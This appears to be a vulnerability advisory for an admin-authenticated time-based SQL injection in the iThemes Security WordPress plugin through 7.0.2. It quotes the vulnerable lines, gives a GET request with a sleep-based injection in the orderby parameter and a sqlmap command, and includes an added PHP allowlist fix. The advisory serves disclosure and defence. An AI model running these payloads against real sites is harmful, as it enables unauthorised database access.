wpexploit
Çlirim Emini
WPEX-ID:1092CABD-41C8-43AE-A08E-538C5BB575B9
History: Jun 22, 2018 - 12:00 a.m.

iThemes Security <= 7.0.2 - Authenticated SQL Injection

2018-06-22 00:00:00
Çlirim Emini

EPSS: 0.925 (High)
EPSS Percentile: 99.0%

The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.

Vulnerability description: iThemes Security appears to be vulnerable to time-based SQL injection. The orderby parameter is vulnerable because the backend variable $sort_by_column is taken from the request and is not escaped or validated before being concatenated into the ORDER BY clause.

Privileges required: Admin user.

Technical details:

File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET['orderby'], $_GET['order'] ) ) {
Line 272:     $sort_by_column = $_GET['orderby'];

File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $sort_by_column );
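A hardened counterpart to the unescaped $sort_by_column handling described above, added here as an example and not the plugin's own code: every requested column is checked against an allowlist of identifiers before anything is concatenated into the ORDER BY clause, and the sort direction is normalised to a fixed keyword. The column names, function name and default ordering are assumptions.

```php
<?php
// Added example (not the plugin's own code): allowlist-based handling of the
// orderby/order request parameters, in contrast to the unescaped
// $sort_by_column shown in the advisory. Column names are assumptions.

// Columns a log table could legitimately be sorted on (assumed names).
const ITSEC_LOG_SORTABLE_COLUMNS = array( 'id', 'timestamp', 'module', 'type', 'remote_ip' );

/**
 * Build a safe ORDER BY clause from untrusted request input.
 *
 * $orderby may be a comma-separated list of column names (the plugin imploded
 * such a list); $order is 'asc' or 'desc'. Anything that is not exactly an
 * allowlisted column name causes the whole list to be rejected in favour of a
 * fixed default, so no request-controlled characters ever reach the SQL string.
 */
function itsec_safe_order_by( $orderby, $order ) {
    $default = ' ORDER BY `id` DESC';
    $columns = array();
    foreach ( explode( ',', (string) $orderby ) as $raw ) {
        $col = strtolower( trim( $raw ) );
        // strict in_array: only an exact allowlisted identifier passes
        if ( ! in_array( $col, ITSEC_LOG_SORTABLE_COLUMNS, true ) ) {
            return $default;
        }
        $columns[] = '`' . $col . '`';
    }
    if ( empty( $columns ) ) {
        return $default;
    }
    // Direction is never copied from the request; it is mapped to a keyword.
    $dir = ( strtolower( (string) $order ) === 'desc' ) ? 'DESC' : 'ASC';
    return ' ORDER BY ' . implode( ', ', $columns ) . ' ' . $dir;
}

// Constructed inputs: a benign sort, then the injection string from the advisory
// (PHP has already URL-decoded %2c to a comma by the time $_GET is populated).
$query = 'SELECT * FROM wp_itsec_logs WHERE module = %s';
echo $query . itsec_safe_order_by( 'remote_ip, timestamp', 'asc' ), "\n";
echo $query . itsec_safe_order_by( 'remote_ip,(select*from(select(sleep(10)))a)', 'asc' ), "\n";
```

The second call falls back to the default ordering because the subquery is not an allowlisted identifier, so the time-based payload never reaches MySQL.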

The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:

http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

Using SQLMAP:

sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3

